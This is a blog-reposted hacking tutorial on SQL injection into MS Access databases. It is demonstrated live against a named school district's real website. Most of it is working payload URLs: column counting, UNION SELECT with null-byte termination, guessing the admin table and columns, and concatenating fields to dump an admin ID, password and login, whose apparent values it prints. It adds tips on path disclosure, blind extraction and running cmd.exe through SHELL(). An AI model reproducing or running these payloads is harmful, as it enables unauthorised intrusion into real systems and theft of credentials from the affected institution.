Home » , » Sql Injection Ms Acces [Mssql] Basic

Sql Injection Ms Acces [Mssql] Basic

Posted by CB Blogger

this tut will show you how to inject into access db.
fisrt,thanks to ☆¸.•*☆ƶεяø ĉööl☆*•.¸☆ for the site.
ok lets start
we gonna inject on this site
http://www.sdhc.k12.fl.us/Schools/School...?Site=0151

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151
how do we know its vuln?like regular injection,typing " ' " in the end of the value.

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151'
error 80040e14
[Image: s33tD.png]
first,i noticed that the there are some people that dont know why this error happens.
so explanation-
the coder expect that we use numbers only.
for example
id=10
id=7
id=234984
or letters
cat_id=index
cat_id=cars
or both
id=car1
A-Z 0-9
but he didnt expect that we use " ' "
because there is no
id=46'78
id=t'6'8'jh
so this error happens. we can type instead of " ' ",@ for example
id=1@
or ^
same principle.
after we understoond that,lets move on.
in access we can counting the columns with order/group by.
(if you dont know why we are couting the columns,read my tut http://hackforums.net/showthread.php?tid=2125898 )

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+68
error 80004005,there is no 68 columns in the table.
[Image: TNCIC.png]
lets try 67

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+67
page load normal,67 columns.
[Image: E7I7G.png]
in access,-- dosent exist,so we are using null-byte (%00).
so

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​ 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67%00
error
"Query input must contain at least one table or query."
[Image: Nn2d5.png]
its ok!!
it means we are correcting at the columns count,but access db its like mysql 4,we have to guess tables and columns.
like that

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from login%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from users%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ​ ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 ​4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
page load normal,admin table exist.
[Image: tgyHO.png]
as you can see,column 4 vuln,lets inject there.
we have to guess columns.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,username,5,6,7,8,9,10,11,12,13,14,1 ​ 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, ​ 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id,5,6,7,8,9,10,11,12,13,14,1 ​ 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, ​ 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
no error,column exist.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_login,5,6,7,8,9,10,11,12,13,1 ​ 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, ​ 41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ​ from admin%00
no error,column exist.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_pass,5,6,7,8,9,10,11,12,13,14 ​ ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 ​ 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_password,5,6,7,8,9,10,11,12,1 ​ 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, ​ 40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 ​,67 from admin%00
no error,column exist
columns : admin_id,admin_login,admin_password.
in access,we cant use concat(),so we are using %26.
so

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id+%26+0x3a+%26+admin_passwor ​ d+%26+0x3a+%26+admin_login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 ​ 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, ​51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67+from+admin%00
[Image: wuANq.png]
1:Powell:Karin

some comments:
-limit dosent exist,so we are using TOP X instead.
UNION SELEC TOP 1 PASS FROM USER
-to find the full path,we are typing a false db,like that

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1+FROM+X.X
c:\windows\system32\inetsrv\X.mdb
-we can run subqueries like that
AND (SELECT TOP 1 data FROM table)%00
-for blind,instead of substring,we are using MID()
UNION SELECT MID(benzi,1,1) FROM table%00
returns b
UNION SELECT MID(benzi,2,1) FROM table%00
returns e.
-we can run shell commands like that
AND SHELL('cmd.exe /c command ')%00
if you wanna get root with shell()
http://withoutmoneyschool.blogspot.co.id/2016/05/sql-injection-owning-windows-server.html
but its rare that the SHELL() will be avaible,cause the admin can block this function.
-the function curdir() returns the location.

Labels: ,

0 comments:

Post a Comment